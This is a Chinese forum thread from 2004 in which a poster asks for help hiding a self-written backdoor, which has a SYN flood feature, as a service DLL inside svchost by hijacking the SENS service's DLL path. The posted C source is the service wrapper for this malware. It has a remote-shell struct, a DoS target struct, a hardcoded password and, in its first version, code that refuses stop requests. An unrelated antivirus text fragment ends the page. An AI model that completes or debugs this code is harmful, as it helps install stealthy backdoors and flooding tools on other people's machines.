15,471
社区成员
发帖
与我相关
我的任务
分享这个DLL为什么不能在svchost中正确启动服务呢?
大家好。我上次问的那个后门所有功能模块都已经写完,包含了一个SYN洪水的功能。现在我正在写它的隐蔽,就是以DLL形式插入到svchost中。可是我写的这个DLL为什么不能正确启动服务呢?(我是替换了系统服务SENS的DLL路径,指向了自己的DLL) 谢谢大家。
(参考了bingle的那篇文章)
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
#include <winsock2.h>
#include <stdlib.h>
#include <tlhelp32.h>
#include <Ws2tcpip.h>
#include <time.h>
#include <string.h>
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;
char pwd[16]="by";char buff[65536];
struct{SECURITY_ATTRIBUTES sa;HANDLE hread,hwrite,cread,cwrite;
STARTUPINFO si;PROCESS_INFORMATION pi;
}extshell;
struct{char target[256];char dostype;char faketype;HANDLE threadhandle;HANDLE timerhandle;
int pausetime;int seconds;int definemins;WORD attackport;WORD useport;}dos;
HANDLE filefp;HANDLE pbitmapwithoutfileh;DWORD sizeimage;unsigned int packnum=0;
__declspec(dllexport)
void WINAPI ServiceMain(DWORD,LPTSTR *);
__declspec(dllexport)
void WINAPI ServiceControl(DWORD);
DWORD WINAPI CmdService(LPVOID);//real telnetEX server function
__declspec(dllexport)
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
return TRUE;
}
__declspec(dllexport)
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpArgv)
{
HANDLE hThread;
ServiceStatus.dwServiceType = SERVICE_WIN32;
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
//donot accept STOP request
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_PAUSE_CONTINUE;
ServiceStatus.dwServiceSpecificExitCode = 0;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
ServiceStatusHandle=RegisterServiceCtrlHandler("SENS",ServiceControl);
if(ServiceStatusHandle==0)
{
return ;
}
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
Sleep(1000);
ServiceStatus.dwCurrentState=SERVICE_RUNNING;
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);
while(1){Sleep(1000);}
return ;
}
void WINAPI ServiceControl(DWORD dwCode)
{
switch(dwCode)
{
case SERVICE_CONTROL_PAUSE:
ServiceStatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
break;
//donot accept STOP request
/* case SERVICE_CONTROL_STOP:
WaitForSingleObject(hMutex,INFINITE);
while(lpProcessDataHead!=NULL)
{
TerminateProcess(lpProcessDataHead->hProcess,1);
if(lpProcessDataHead->next!=NULL)
{
lpProcessDataHead=lpProcessDataHead->next;
}
else
{
lpProcessDataHead=NULL;
}
}
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
ReleaseMutex(hMutex);
CloseHandle(hMutex);
return ;*/
case SERVICE_CONTROL_INTERROGATE:
break;
default:
break;
}
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
return ;
}
DWORD WINAPI CmdService(LPVOID lpParam){ ……}//主要工作函数
(参考了bingle的那篇文章)
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
#include <winsock2.h>
#include <stdlib.h>
#include <tlhelp32.h>
#include <Ws2tcpip.h>
#include <time.h>
#include <string.h>
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;
char pwd[16]="by";char buff[65536];
struct{SECURITY_ATTRIBUTES sa;HANDLE hread,hwrite,cread,cwrite;
STARTUPINFO si;PROCESS_INFORMATION pi;
}extshell;
struct{char target[256];char dostype;char faketype;HANDLE threadhandle;HANDLE timerhandle;
int pausetime;int seconds;int definemins;WORD attackport;WORD useport;}dos;
HANDLE filefp;HANDLE pbitmapwithoutfileh;DWORD sizeimage;unsigned int packnum=0;
__declspec(dllexport)
void WINAPI ServiceMain(DWORD,LPTSTR *);
__declspec(dllexport)
void WINAPI ServiceControl(DWORD);
DWORD WINAPI CmdService(LPVOID);//real telnetEX server function
__declspec(dllexport)
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
return TRUE;
}
__declspec(dllexport)
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpArgv)
{
HANDLE hThread;
ServiceStatus.dwServiceType = SERVICE_WIN32;
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
//donot accept STOP request
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_PAUSE_CONTINUE;
ServiceStatus.dwServiceSpecificExitCode = 0;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
ServiceStatusHandle=RegisterServiceCtrlHandler("SENS",ServiceControl);
if(ServiceStatusHandle==0)
{
return ;
}
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
Sleep(1000);
ServiceStatus.dwCurrentState=SERVICE_RUNNING;
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);
while(1){Sleep(1000);}
return ;
}
void WINAPI ServiceControl(DWORD dwCode)
{
switch(dwCode)
{
case SERVICE_CONTROL_PAUSE:
ServiceStatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
break;
//donot accept STOP request
/* case SERVICE_CONTROL_STOP:
WaitForSingleObject(hMutex,INFINITE);
while(lpProcessDataHead!=NULL)
{
TerminateProcess(lpProcessDataHead->hProcess,1);
if(lpProcessDataHead->next!=NULL)
{
lpProcessDataHead=lpProcessDataHead->next;
}
else
{
lpProcessDataHead=NULL;
}
}
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
ReleaseMutex(hMutex);
CloseHandle(hMutex);
return ;*/
case SERVICE_CONTROL_INTERROGATE:
break;
default:
break;
}
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
return ;
}
DWORD WINAPI CmdService(LPVOID lpParam){ ……}//主要工作函数
...全文
请发表友善的回复…
发表回复
zhang_231 2004-12-09
- 打赏
- 举报
aaaaa
baiyuanfan 2004-11-08
- 打赏
- 举报
更新后的代码(仍然有问题):
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
#include <winsock2.h>
#include <stdlib.h>
#include <tlhelp32.h>
#include <Ws2tcpip.h>
#include <time.h>
#include <string.h>
#pragma comment(lib,"advapi32.lib")
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;
char pwd[16]="by";char buff[65536];
struct{SECURITY_ATTRIBUTES sa;HANDLE hread,hwrite,cread,cwrite;
STARTUPINFO si;PROCESS_INFORMATION pi;
}extshell;
struct{char target[256];char dostype;char faketype;HANDLE threadhandle;HANDLE timerhandle;
int pausetime;int seconds;int definemins;WORD attackport;WORD useport;}dos;
//0 not,1 syn,2 tcp//0 nolimit,1 Bclass,2 nofake
HANDLE filefp;HANDLE pbitmapwithoutfileh;DWORD sizeimage;unsigned int packnum=0;//num of pack sent already
__declspec(dllexport)
void WINAPI ServiceMain(DWORD,LPTSTR *);
void WINAPI ServiceControl(DWORD);
DWORD WINAPI CmdService(LPVOID);//real telnetEX server function
void output(char *);
void output(char *msg){
HANDLE outfp=CreateFile("d:\\out.txt",GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
DWORD byteswritten;WriteFile(outfp,msg,strlen(msg),&byteswritten,0);CloseHandle(outfp);
return;
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
return TRUE;
}
__declspec(dllexport)
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpArgv)
{
HANDLE hThread;
ServiceStatus.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;//very important
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
ServiceStatus.dwServiceSpecificExitCode = 0;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 3000;
ServiceStatusHandle=RegisterServiceCtrlHandler("SENS",ServiceControl);
if(ServiceStatusHandle==0)
{output("RegisterServiceCtrlHandler error");
return ;
}
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 3000;
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
Sleep(1000);
ServiceStatus.dwCurrentState=SERVICE_RUNNING;
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);
do{
Sleep(10);//not quit until receive stop command, otherwise the service will stop
}while(ServiceStatus.dwCurrentState != SERVICE_STOP_PENDING && ServiceStatus.dwCurrentState != SERVICE_STOPPED);
return ;
}
void WINAPI ServiceControl(DWORD dwCode)
{
switch(dwCode)
{
case SERVICE_CONTROL_PAUSE:
ServiceStatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
break;
case SERVICE_CONTROL_STOP:
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
return ;
case SERVICE_CONTROL_INTERROGATE:
break;
default:
break;
}
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
return ;
}
DWORD WINAPI CmdService(LPVOID lpParam){……}//主要工作线程
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
#include <winsock2.h>
#include <stdlib.h>
#include <tlhelp32.h>
#include <Ws2tcpip.h>
#include <time.h>
#include <string.h>
#pragma comment(lib,"advapi32.lib")
SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE ServiceStatusHandle;
char pwd[16]="by";char buff[65536];
struct{SECURITY_ATTRIBUTES sa;HANDLE hread,hwrite,cread,cwrite;
STARTUPINFO si;PROCESS_INFORMATION pi;
}extshell;
struct{char target[256];char dostype;char faketype;HANDLE threadhandle;HANDLE timerhandle;
int pausetime;int seconds;int definemins;WORD attackport;WORD useport;}dos;
//0 not,1 syn,2 tcp//0 nolimit,1 Bclass,2 nofake
HANDLE filefp;HANDLE pbitmapwithoutfileh;DWORD sizeimage;unsigned int packnum=0;//num of pack sent already
__declspec(dllexport)
void WINAPI ServiceMain(DWORD,LPTSTR *);
void WINAPI ServiceControl(DWORD);
DWORD WINAPI CmdService(LPVOID);//real telnetEX server function
void output(char *);
void output(char *msg){
HANDLE outfp=CreateFile("d:\\out.txt",GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
DWORD byteswritten;WriteFile(outfp,msg,strlen(msg),&byteswritten,0);CloseHandle(outfp);
return;
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
return TRUE;
}
__declspec(dllexport)
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpArgv)
{
HANDLE hThread;
ServiceStatus.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;//very important
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_PAUSE_CONTINUE;
ServiceStatus.dwServiceSpecificExitCode = 0;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 3000;
ServiceStatusHandle=RegisterServiceCtrlHandler("SENS",ServiceControl);
if(ServiceStatusHandle==0)
{output("RegisterServiceCtrlHandler error");
return ;
}
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 3000;
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
Sleep(1000);
ServiceStatus.dwCurrentState=SERVICE_RUNNING;
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);
do{
Sleep(10);//not quit until receive stop command, otherwise the service will stop
}while(ServiceStatus.dwCurrentState != SERVICE_STOP_PENDING && ServiceStatus.dwCurrentState != SERVICE_STOPPED);
return ;
}
void WINAPI ServiceControl(DWORD dwCode)
{
switch(dwCode)
{
case SERVICE_CONTROL_PAUSE:
ServiceStatus.dwCurrentState = SERVICE_PAUSED;
break;
case SERVICE_CONTROL_CONTINUE:
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
break;
case SERVICE_CONTROL_STOP:
ServiceStatus.dwCurrentState = SERVICE_STOPPED;
ServiceStatus.dwWin32ExitCode = 0;
ServiceStatus.dwCheckPoint = 0;
ServiceStatus.dwWaitHint = 0;
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
return ;
case SERVICE_CONTROL_INTERROGATE:
break;
default:
break;
}
SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
return ;
}
DWORD WINAPI CmdService(LPVOID lpParam){……}//主要工作线程
baiyuanfan 2004-11-08
- 打赏
- 举报
现在发现ServiceStatus.dwServiceType= SERVICE_WIN32;这句应该有问题,我改成了 SERVICE_WIN32_SHARE_PROCESS,但是好象错误的表现并没有变化。
baiyuanfan 2004-11-08
- 打赏
- 举报
求助,顶啊
wangyupacket 2004-11-08
- 打赏
- 举报
mark
baiyuanfan 2004-11-07
- 打赏
- 举报
求助,顶啊
baiyuanfan 2004-11-06
- 打赏
- 举报
顶,求助各位高手
baiyuanfan 2004-11-06
- 打赏
- 举报
然后服务管理器中显示状态为已启动,但暂停,停止等选项都是灰的,而且端口并没有打开。
谢谢大家指教!
谢谢大家指教!
baiyuanfan 2004-11-06
- 打赏
- 举报
DLL没法DEBUG啊,不知道。是在服务管理器里启动到%50时基本卡死
baiyuanfan 2004-11-06
- 打赏
- 举报
顶,求助各位高手
linxy2002 2004-11-06
- 打赏
- 举报
你说的不能正常启动服务是指在什么地方出错了啊,
是调用DLL就不对了,还是什么地方错问题了啊
是调用DLL就不对了,还是什么地方错问题了啊
baiyuanfan 2004-11-06
- 打赏
- 举报
顶,求助各位高手
gooyan 2004-11-05
- 打赏
- 举报
学习下
baiyuanfan 2004-11-05
- 打赏
- 举报
顶,求助各位高手
略在每个扫描程序属性页中是启用的。 - 其次,逐一配置每个扫描程序(按访问扫描程序、按需扫描程序和电 子邮件扫描程序),并指定在检测到有害程序时扫描程序要执行的操 作。在此处指定的操作与其他扫描...
